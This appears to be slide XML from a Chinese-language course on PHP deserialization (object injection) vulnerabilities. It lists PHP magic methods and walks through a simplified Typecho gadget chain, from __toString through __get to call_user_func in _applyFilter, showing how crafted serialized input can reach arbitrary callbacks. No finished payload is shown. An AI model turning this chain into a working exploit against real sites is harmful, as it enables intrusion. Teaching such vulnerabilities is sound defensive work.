                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__callStatic()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，用静态方式中调用一个不可访问方法时调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__get()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，读取一个不可访问属性的值时会被调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__set()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，给不可访问的属性赋值时会被调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__isset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对不可访问属性调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>isset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>empty()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__unset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对不可访问属性调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unset()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时被调用。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__sleep()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>serialize()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时，先会调用这个函数</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__wakeup()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unserialize()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>时，先会调用这个函数</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__toString()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，类被当成字符串时的回应方法</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__invoke()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，调用函数的方式调用一个对象时的回应方法</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__set_state()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，调用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>var_export()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>导出类时，此静态方法会被调用。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__clone()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，当对象复制完成时调用</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__autoload()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，尝试加载未定义的类</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="x-none" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>__debugInfo()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>，打印所需调试信息</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tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="724092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A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172791" y="663997"/>
            <a:ext cx="10657184" cy="825883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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下面是一个使用</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魔术方法的类的示例，在反序列化时，类中的</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__wakeup()</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方法会被调用，并输出“</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Hello World”</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3013191661"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1196809" y="1816125"/>
          <a:ext cx="10229028" cy="4267200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="4032448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class magic{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>function __wakeup(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        echo 'Hello World';</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$object = new magic();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$serialized = serialize($object);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>unserialize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>($serialized);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3864637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1388815" y="2896245"/>
            <a:ext cx="10441160" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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知识点一：文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3174394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596727" y="875216"/>
            <a:ext cx="4392488" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="4022902"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3000896" y="396035"/>
              <a:ext cx="508859" cy="2522251"/>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1928801" y="1402731"/>
              <a:ext cx="3514207"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en-US" altLang="zh-CN"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PHP</a:t>
              </a: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反序列化漏洞</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3</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sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152156" y="1528093"/>
            <a:ext cx="10657184" cy="4519202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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反序列化漏洞又叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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对象注入漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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32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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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一个应用中，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="32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unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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3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sz="32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参数</a:t>
            </a:r>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是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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用户可控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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的，那么攻击者就可以通过传入一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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精心构造的序列化字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3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3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魔术方法来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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控制对象内部的变量甚至是函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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32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50000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="32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对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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这一类漏洞的利用，往往需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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应用的源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3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1957102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1208794" y="447973"/>
            <a:ext cx="10657185" cy="1129749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">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下面是笔者从一个现实场景中精简出的实例，我们将结合这个实例理解反序列化产生的原理以及如何对其进行利用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460822" y="1744117"/>
            <a:ext cx="10153128" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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typecho.php</a:t>
            </a:r>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24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php</a:t>
            </a:r>
            <a:endPar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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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Typecho_Db</a:t>
            </a:r>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public function __construct($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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adapterName</a:t>
            </a:r>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adapterName</a:t>
            </a:r>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4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Typecho_Db_Adapter</a:t>
            </a:r>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_' . $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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adapterName</a:t>
            </a:r>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p>
          <a:p>
            <a:endPar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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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Typecho_Feed</a:t>
            </a:r>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private $item;</a:t>
            </a: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public function __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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toString</a:t>
            </a:r>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$this-&gt;item['author']-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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screenName</a:t>
            </a:r>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4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805638" y="3904357"/>
            <a:ext cx="2808312" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116014"/>
              <a:gd name="adj2" fmla="val -7086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t>如果参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>adapterName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>是一个对象，则字符串的拼接会调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16865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linds(horizontal)">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 grpId="0"/>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DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="375965"/>
            <a:ext cx="10153128" cy="6247864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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Typecho_Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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private $_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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params</a:t>
            </a:r>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 array();</a:t>
            </a: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private $_filter = array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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public function __get($key)</a:t>
            </a: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return $this-&gt;get($key);</a:t>
            </a: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public function get($key, $default = NULL)</a:t>
            </a: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switch (true) {</a:t>
            </a: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case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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isset</a:t>
            </a:r>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($this-&gt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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params</a:t>
            </a:r>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[$key]):</a:t>
            </a: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$value = $this-&gt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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params</a:t>
            </a:r>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[$key];</a:t>
            </a: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break;</a:t>
            </a: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default:</a:t>
            </a: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$value = $default;</a:t>
            </a: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break;</a:t>
            </a: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$value = !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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is_array</a:t>
            </a:r>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($value) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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strlen</a:t>
            </a:r>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($value) &gt; 0 ? $value : $default;</a:t>
            </a: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return $this-&gt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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applyFilter</a:t>
            </a:r>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($value);</a:t>
            </a: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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418109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DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="375965"/>
            <a:ext cx="10153128" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endPar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private function _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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applyFilter</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($value)</a:t>
            </a:r>
          </a:p>
          <a:p>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if ($this-&gt;_filter) {</a:t>
            </a:r>
          </a:p>
          <a:p>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foreach</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($this-&gt;_filter as $filter) {</a:t>
            </a:r>
          </a:p>
          <a:p>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$value = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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is_array</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($value) ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="28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array_map</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($filter, $value) :</a:t>
            </a:r>
          </a:p>
          <a:p>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call_user_func</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($filter, $value);</a:t>
            </a:r>
          </a:p>
          <a:p>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p>
          <a:p>
            <a:endPar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$this-&gt;_filter = array();</a:t>
            </a:r>
          </a:p>
          <a:p>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p>
          <a:p>
            <a:endPar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return $value;</a:t>
            </a:r>
          </a:p>
          <a:p>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2" name="圆角矩形标注 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6933431" y="3760341"/>
            <a:ext cx="2808312" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116014"/>
              <a:gd name="adj2" fmla="val -7086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t>将第一个参数作为回调函数，后面的参数作为回调函数的参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326629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1100783" y="736005"/>
            <a:ext cx="11089233" cy="2026212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
